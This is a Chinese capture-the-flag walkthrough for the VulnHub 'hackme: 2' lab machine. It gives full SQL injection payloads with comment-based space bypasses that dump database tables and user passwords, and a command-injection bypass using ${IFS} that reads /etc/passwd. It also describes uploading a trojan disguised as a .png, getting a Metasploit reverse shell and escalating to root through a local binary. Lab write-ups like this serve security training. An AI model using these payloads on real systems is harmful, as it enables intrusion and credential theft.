一、靶机介绍
1.下载地址:https://www.vulnhub.com/entry/hackme-2,618/
2.将靶机网络适配器改为仅主机模式
3.启动靶机
二、信息收集
1.扫描靶机,发现其开放22、80端口
nmap 192.168.139.1/24
2.浏览器访问
3.注册用户并登录,admin/123456
4.尝试sql手工注入
a%'/**/and/**/length(database())>1#
尝试一下 union 注入
- a%'/**/union/**/select/**/1,2,3#
获取数据库名等基本信息
x%'/**/union/**/select/**/user(),database(),version()#
获取表名
x%'/**/union/**/select/**/TABLE_NAME,2,3/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=database()#
获取列名
x%'/**/union/**/select/**/column_name,2,3/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA=database()/**/and/**/TABLE_NAME='users'#
获取表信息
x%'/**/union/**/select/**/user,pasword,3/**/from/**/users#
5.解密密码
解密后:Uncrackable
6.使用超级管理员登录,发现其存在文件上传点
7.尝试上传phpinfo.php文件,发现上传失败,限制了上传格式
8.确认存在命令执行漏洞
9.进一步验证,判断其可能存在空格过滤
10.尝试绕过空格过滤
system('cat${IFS}/etc/passwd')
11.获取文件上传的路径
12.通过kali生成木马
13.通过网页上传.png,并改包
14.kali开启msf监听
15.浏览器访问木马文件,msf反弹成功
16.切换到shell,输入whoami可查看具体信息
17.跳转到home/legacy目录下,ls发现 ./touchmenot文件
18.输入 ./touchmenot,运行获得root